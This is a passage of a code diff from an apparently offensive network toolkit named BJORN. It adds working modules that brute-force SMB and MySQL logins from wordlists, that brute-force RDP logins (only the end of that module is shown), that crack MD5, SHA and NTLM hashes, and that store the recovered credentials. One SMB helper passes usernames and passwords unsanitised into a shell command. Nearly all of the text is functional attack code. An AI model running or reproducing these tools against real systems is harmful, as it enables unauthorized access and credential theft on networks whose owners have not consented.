self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

209
actions/rune_cracker.py Normal file
View File

@@ -0,0 +1,209 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, shared_data):
self.shared_data = shared_data
self.hashes: Set[str] = set()
self.cracked: Dict[str, Dict[str, Any]] = {}
self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Performance tuning for Pi Zero 2
self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
def _hash_password(self, password: str, h_type: str) -> Optional[str]:
"""Generate hash for a password using specified algorithm."""
try:
if h_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif h_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif h_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif h_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None
def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Worker function for cracking passwords."""
if self.shared_data.orchestrator_should_exit:
return
for h_type in HASH_PATTERNS.keys():
if self.hash_type and self.hash_type != h_type:
continue
hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
with self.lock:
if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try:
with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
for line in f:
hv = line.strip()
if not hv: continue
# Auto-detect or validate
for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
break
except Exception as e:
logger.error(f"Error loading hashes: {e}")
return "failed"
if not self.hashes:
logger.warning("No valid hashes found in input file.")
return "failed"
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
try:
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False)
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e:
logger.error(f"Cracking engine error: {e}")
return "failed"
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")

File diff suppressed because it is too large Load Diff

381
actions/smb_bruteforce.py Normal file
View File

@@ -0,0 +1,381 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Wrapper orchestrateur -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Lance le bruteforce SMB pour (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_primary_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_primary_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SMB dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_primary_phase(fallback_passwords)
# Keep smbclient -L fallback on dictionary passwords only (cost control).
if not success_flag[0] and not self.shared_data.orchestrator_should_exit:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in dict_passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if self.progress is not None:
self.progress.advance(1)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(
f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L"
)
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# insère self.results dans creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # utilise la colonne 'database' pour distinguer les shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# plus nécessaire avec l'index unique; conservé pour compat.
pass
if __name__ == "__main__":
# Mode autonome non utilisé en prod; on laisse simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

304
actions/sql_bruteforce.py Normal file
View File

@@ -0,0 +1,304 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Connexion sans DB puis SHOW DATABASES; une entrée par DB trouvée
- Succès -> DB.creds (service='sql', database=<db>)
- Conserve la logique (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SQLBruteforce:
"""Wrapper orchestrateur -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Lance le bruteforce SQL pour (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Gère les tentatives SQL (MySQL), persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connexion sans DB puis SHOW DATABASES; retourne (True, [dbs]) ou (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
